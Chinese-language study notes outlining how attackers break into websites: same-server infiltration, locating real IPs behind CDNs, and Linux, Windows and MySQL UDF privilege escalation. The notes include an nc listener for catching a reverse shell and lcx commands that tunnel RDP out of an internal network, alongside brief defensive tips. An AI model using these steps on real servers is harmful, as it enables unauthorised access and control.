黑客是如何实施攻击的的网站的？

旁注攻击 同服渗透

旁注包括两部分：旁注和提权

ip逆向查询同服网站

旁注查询软件scscaner

数据库权限最小化原则

网站目录的可写和执行权限

攻击思路：

如果数据库的权限大

可以构造注入点

CDN加速隐藏真实ip

ip节点

获取真实ip

我们不能被自身的问题交给

cdn来处理，把自己的问题处理好

才是真正的防御之道。

提权分类：

溢出提权：利用系统本身或者

系统中的软件来提权

又分为远程溢出和本地溢出

远程溢出：系统漏洞补丁

本地溢出条件：

需要一个用户可执行权限

第三方组件提权

黑客是如何用溢出提权的？

Linux提权

攻击思路：

利用执行exp来提权

1）查看内核

uname -a

id&uname -a

2）监听本地端口

nc -l -n -v -p 8888

此时计算机为外网ip，否则需要转发

3）大马反弹shell

nc反弹

为什么？需要反弹

因为在脚本中运行shell

没有回显信息

4）上传exp溢出提权

获得服务器的root权限

windows提权

1）探测服务器支持的脚本语言

2）执行简单的系统命令

数据库提权

mysql5.0倒入道c：/windows

5.1倒入道plugin安装目录

mysql udf用户自定义函数 提权

启动项提权

第三方组件提权

防止端口扫描 修改端口 复杂密码

服务器在内网中的常见端口转发：

lcx转发：

服务器端：

lcx -listen 8888

客户端：

lcx -slave rip rport 127.0.0.1 3389